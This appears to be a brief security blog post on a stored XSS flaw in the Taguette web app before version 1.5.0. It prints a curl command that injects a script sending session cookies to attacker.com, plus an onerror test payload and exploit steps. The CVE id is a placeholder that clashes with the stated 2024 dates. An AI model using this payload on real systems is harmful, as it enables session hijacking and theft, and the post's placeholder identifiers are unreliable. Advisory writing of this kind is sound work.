Listen to this Post
How the mentioned CVE works:
The vulnerability CVE-2025-XXXX is a stored Cross-Site Scripting (XSS) flaw within the Taguette web application. In versions prior to 1.5.0, the application fails to properly sanitize user-supplied input in specific fields before rendering it in the web page. An authenticated project member can inject malicious JavaScript code into the ‘name’ or ‘description’ fields for both tags and documents. This malicious payload is then stored in the application’s database. Whenever a project is loaded, the unsanitized input is served back to the user’s browser and the embedded JavaScript code is executed in the context of the victim’s session. This allows an attacker to perform actions on behalf of the user, such as stealing session cookies or manipulating the project’s content.
Platform: Taguette
Version: <1.5.0
Vulnerability : Stored XSS
Severity: Moderate
date: 2024-10-20
Prediction: 2024-10-27
What Undercode Say:
Example payload for tag name
curl -X POST 'http://taguette-instance/project/1/tags' -H 'Cookie: session=...' -d 'name=<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>&description=test'
<!-- Malicious script injected into a document description -->
<img src=x onerror="alert('XSS')">
How Exploit:
1. Attacker logs into Taguette.
2. Creates or edits a tag/document.
3. Inserts malicious script into name/description.
4. Script executes when victim views the project.
Protection from this CVE:
Upgrade to Taguette 1.5.0.
Implement output encoding.
Use Content Security Policy.
Impact:
Session hijacking.
Data theft.
UI manipulation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
